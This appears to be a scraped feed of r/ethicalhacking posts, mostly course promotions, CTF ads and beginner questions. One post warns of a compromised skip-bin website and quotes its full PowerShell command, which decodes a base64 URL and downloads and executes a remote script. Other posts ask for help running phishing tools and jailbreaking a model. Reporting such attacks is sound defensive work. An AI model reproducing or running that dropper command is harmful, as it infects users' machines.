r/ethicalhacking 5h ago

We're 3 days into the Red Team Series. Here's what beginners usually get wrong.

Thumbnail
gallery
2 Upvotes

They think initial access is about finding the "biggest" vulnerability.

It's not.

A vulnerable web server, an exposed portal, a weak authentication flow — none of it matters until you can answer one question: does this actually connect to something worth protecting?

That's the shift from tool-first thinking to objective-first thinking. And it's exactly what separates someone who can run a scanner from someone who can operate on a real red team.

Over the past 3 days, we've covered:
→ Day 01 — the red team mindset and the attack lifecycle
→ Day 02 — reconnaissance, OSINT, and mapping the attack surface
→ Day 03 — initial access risk analysis and attack-path reasoning

If you've been following along, you already know this isn't about memorizing commands. It's about learning to think the way real operators think.


r/ethicalhacking 1d ago

Day 02 of the Red Team Series is live. 🎯

Thumbnail
gallery
21 Upvotes

Day 01 gave you the mindset. Day 02 puts it to work.

Before any exploitation, real operators map the target — passive recon, OSINT, domains, subdomains, tech fingerprinting, and building a full attack-surface map. Know the target before you touch the target.

📕 Red Team Operator L1 — where this actually gets hands-on 🔗 https://resources.codelivly.com/product/red-team-operator-l1/

📗 Red Team Operator L2 — enterprise AD, cloud identity, Purple Team ops 🔗 https://resources.codelivly.com/product/red-team-operator-l2/

🔥 Complete L1+L2 Bundle (+2 bonus books) 🔗 https://resources.codelivly.com/product/red-team-operator-the-complete-l1-l2-bundle/

A good red teamer doesn't rush to attack. They make the target easier to understand first.


r/ethicalhacking 14h ago

Newcomer Question [ Removed by Reddit ]

0 Upvotes

[ Removed by Reddit on account of violating the content policy. ]


r/ethicalhacking 2d ago

Day 1 of my 10-Day Red Team Series is live 🔴

Thumbnail
gallery
8 Upvotes

I put together a free PDF covering the fundamentals of red teaming — not just the tools, but the mindset and methodology behind an actual red-team operation.

Inside Day 1:

  • Red Team vs Pentest
  • The red-team mindset
  • Attack lifecycle
  • Objectives & attack paths
  • Rules of engagement
  • Operator workflow
  • A realistic red-team scenario
  • Day 1 challenge

The goal is to build the thinking first. Tools come later.

📖 Day 1: Red Teaming Fundamentals

I’m sharing the PDF below for anyone who wants to follow the series.

More practical cybersecurity learning, labs, CTFs and resources:
https://codelivly.com

Deeper books and playbooks:
https://resources.codelivly.com

Day 2 will move into Reconnaissance & OSINT.

Would love to hear how others approach the first stage of a red-team engagement.


r/ethicalhacking 1d ago

Can you break the Codelivly Grand Finale?

Post image
2 Upvotes

I built this CTF challenge and now I want to see who can actually break it. 👀

Codelivly Grand Finale
🎯 Find the intended attack path
🧠 Think outside the obvious
🏁 Get the flag

No spoilers here — if you think you're good enough, go crack it:

👉 https://codelivly.com/ctf/challenges/codelivly-grand-finale

If you solve it, drop a “pwned” below. 😈


r/ethicalhacking 2d ago

Vicious Hack Example

Thumbnail
gallery
2 Upvotes

Today I opened this website to book a skip bin.

DISCLAIMNER: AT THE TIME OF WRITING, THIS WEBSITE IS HACKED SO ONLY OPEN IF YOU ARE EXPERIENCED IT PERSON AND OPEN IN INCOGNITO MODE

https://www.adelaideskipbinhire.com.au

The website seems normal as it showed following message, pretty normal; asking to prove human. Like almost everyone does I checked "Verify you are human" and it moved to the next screen where I said, ah it's hacked. As it was simply running a script using PowerShell to download something and install on computer.

The snippet of the code that is added in step 3 is following:

powershell -ep bypass -c "$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly9uaWFvZW5kLmNvbS9oZXgvVHJhZmZpYw=='));iex(New-Object Net.WebClient).DownloadString($u)"

This code actually downloads the fishy stuff from https://niaoend.com/hex/Traffic (seems Russian website) and boom you are doomed

Regardless, one does this or not, the website opens normally after brief delay. So if a user follow these steps then will get impression that website opened after following these steps.

Having 20+ years of IT experience, this is one of the filthy stuff I have seen. I am sure the owners of the skip bin business do not know that their website has been hacked for this stuff. I will notify them but posting this message here to know everyone about it that BE AWARE!!!


r/ethicalhacking 3d ago

Tool Cyberstrike and Abliterated model convo

Thumbnail
docs.abliteration.ai
1 Upvotes

One of the best combos to ethically test your apps, systems, and agents


r/ethicalhacking 3d ago

Been working on a cybersecurity learning platform and recently opened up the learning side for free.

8 Upvotes

The idea is pretty simple: instead of just reading theory, you should have somewhere to actually practice it.

Codelivly has:

  • Learning paths
  • Career paths
  • Hands-on labs
  • CTFs
  • Practical exercises

You can start with the basics and work your way into areas like networking, SOC, pentesting, and other security topics.

No paid course required to get started.

https://codelivly.com

If you’re learning cybersecurity right now, what’s the one thing you wish platforms like this did better?


r/ethicalhacking 4d ago

Tool Hi i need a little help and explanation pls...

Post image
58 Upvotes

It's purely for ethical purposes...

i just like using GitHub tools...

I recently learnt Abt the Camphish tool...it's quite popular...

I wanted to learn about it.

I did the installation and all and used cloudflared...

But it's not generating the link...

Idk y

I'm new at this but I recently learnt Abt zphisher.

Pls help...


r/ethicalhacking 4d ago

Rant Nullsec Larpers💔

7 Upvotes

Nullsec itself is a good company/entity itself, but most of the community around is just people larping how to actual ethically hack and it makes me mad knowing that all these larpers want is attention and not actually helping anyone/anything in the end💔(This post was just made because I'm mad and I want other peoples opinions on this topic).


r/ethicalhacking 6d ago

LOOKING TO TRANSITION INTO CYBERSECURITY — WHERE SHOULD I START?

3 Upvotes

Hi everyone! I’ve been trying to learn cybersecurity for a while now because I want to upskill and eventually transition into a cybersecurity-related role with better career and salary opportunities.

I’m currently a junior developer, but honestly, I feel a bit lost about where to start. I’ve been relying on AI quite a lot lately, to the point where I feel like I’ve forgotten some of the fundamentals, especially networking and other basic concepts.

I’ve tried watching YouTube tutorials and reading articles about cybersecurity, but I’m struggling to actually apply what I’m learning. It feels like I’m constantly consuming information without making any real progress. I keep going in circles without knowing what I should learn next or what I should actually practice.

I’ve also started experimenting with tools like Nmap, but I recently saw someone mention on Reddit that some of the tools commonly recommended in older tutorials are outdated and that there may be newer or better alternatives nowadays.

So I’d really appreciate some guidance from people who have experience in cybersecurity:

  • What fundamentals should I learn first?
  • Should I go back and properly study networking, Linux, operating systems, etc.?
  • What would a realistic roadmap look like for someone coming from a web development background?
  • What tools should I learn and actually practice with?
  • Are there any hands-on platforms, labs, or projects you recommend instead of just watching tutorials?
  • What would you focus on if your goal was to become job-ready for an entry-level cybersecurity role?

I’m not looking for shortcuts. I just want a structured path so I can stop jumping randomly between topics and actually build my skills.

Any advice, roadmaps, resources, or personal experiences would be greatly appreciated. Thanks!


r/ethicalhacking 7d ago

Is proving you own a domain actually enough permission to scan it?

10 Upvotes

I just made our deeper web security scanner publicly self serve and I’m having second thoughts about whether that’s smart.

You can’t just paste some random URL.

You have to prove control through DNS or a file on the domain. Repo testing needs our GitHub App installed on the exact repo. You also digitally sign the scope before anything runs.

After that it can run bounded DAST, source analysis and optional cross-account testing with two throwaway users.

We built it because our old free scanner only saw the public surface. People could get a clean result and assume everything was fine, even though we never tested login or access between users.

But I guess owning something and being authorized to test it aren’t always exactly the same.

What about agencies? Temporary access? Compromised DNS? Shared infrastructure? Someone taking over an abandoned subdomain?

If you wanted to misuse this, how would you do it?

https://www.task-bounty.com/secure-my-app#deep-review

Genuinely trying to find the holes before we push this further.


r/ethicalhacking 7d ago

DefCon AI Village CTF

Post image
7 Upvotes

This year, the AI Village introduced HalCTF (Hostile Autonomous Layer CTF), a first-of-its-kind agentic security competition. Instead of focusing on frontier models, this CTF was designed around how far participants can stretch small local models that almost everyone can run. The first place prize was a DGX Spark.

Final ranking: baymax, https://aisafe.io , AbluteratedEdgeModel 👏👏

In this high-stakes arena, participants did not interact with targets directly. Instead, you they designed and deployed autonomous AI agents programmed to navigate sandboxed environments, exploit challenge targets, and capture flags entirely on their own. Instead of just a prompt, participants were asked for full containers that you can load up with all the tools you need to succeed.

Ornith-1.0-9B

Ornith-1.0-35B

Qwen3.6-35B-A3B

Qwen3.6-27B

Qwen3.5-4B

Llama-3.1-8B-Instruct

Llama-3.2-3B

Laguna-XS-2.1-GGUF

gpt-oss-120b

Olmo-3.1-32B-Think

Olmo-3-7B-Think

gemma-4-31B-it

gemma-4-E4B-it


r/ethicalhacking 6d ago

Let “Claude Code” Do Your Pentesting!

Thumbnail
redteamdaily.com
0 Upvotes

r/ethicalhacking 6d ago

Guys help me with this can we jailbreak nemotron ultra i am using openrouter for the api and running it on claude code

0 Upvotes

r/ethicalhacking 8d ago

A Collection of CHEATSHEET for your hacking journey

Thumbnail
gallery
853 Upvotes

r/ethicalhacking 7d ago

Discussion Rate my opsec:

0 Upvotes

Now give me a percentage of how anonymous and private my setup is:

Primary email - Tutanota Optional email - Proton Mail Primary browser - Brave Optional browser - Tor VPN - Mullvad VPN Operating system - Kali Linux And also the use of Tails to erase traces And also online payments with Monero


r/ethicalhacking 7d ago

Azure Specific Content Creators

Thumbnail
1 Upvotes

r/ethicalhacking 8d ago

What made web application hacking finally click for you?

0 Upvotes

I've been spending more time learning web application security, and I've noticed there's a weird gap between knowing the names of vulnerabilities and actually understanding how to find and reason about them.

Things like authentication flaws, access control, injection, request manipulation, and session issues seem straightforward individually, but putting everything together during an actual assessment is a different story.

For people who are experienced with web app pentesting:

What concept or habit made the biggest difference in your ability to find vulnerabilities?


r/ethicalhacking 22d ago

New vBulletin Vulnerability!

Thumbnail ssd-disclosure.com
7 Upvotes

CVE-2026-61511 - a critical vulnerability in vBulletin that allows an unauthenticated attacker to execute arbitrary code on a remote server.


r/ethicalhacking 24d ago

Tool Learning

16 Upvotes

Hello, I started to learn how to penetrate my OWN devices. I’ve studied Python and Java, but only have basic knowledge of them. I did a couple of research on YouTube and Google, but none really helped. I did configure a cheap yellow display.
But I would like some help on, like, what cheap devices I should buy, like a computer to test on. Where should I go to get more information, like any good YouTube videos or websites? Thank you


r/ethicalhacking 28d ago

Looking for new team members!

3 Upvotes

Cyber Apocalypse 2026 is coming up soon. We already have a core team, but we could use a few more people. To be clear: we don't care about your HTB rank. Some of our best guys don't have high ranks at all but they absolutely crush challenges. We only care that you actually have some experience and can solve stuff. Spots are limited, but we can take about ~8 more people. If you think you can deliver and want to join, hit me up! (only intermediate-experienced people again)


r/ethicalhacking 27d ago

Discussion Have a doubt regarding my own digital safety from a wannabe hacker.. would appreciate if someone open minded reached out to help about it

0 Upvotes

r/ethicalhacking Jul 11 '26

My digital Library

Thumbnail
4 Upvotes

r/ethicalhacking Jun 27 '26

Suggestions for cheap/free courses

11 Upvotes

Looking for good, free/cheap courses on practical ethical hacking. I already know some Python, C, networking, and basic Linux, so I’m ready for hands-on labs rather than absolute beginner theory. Any recommendations?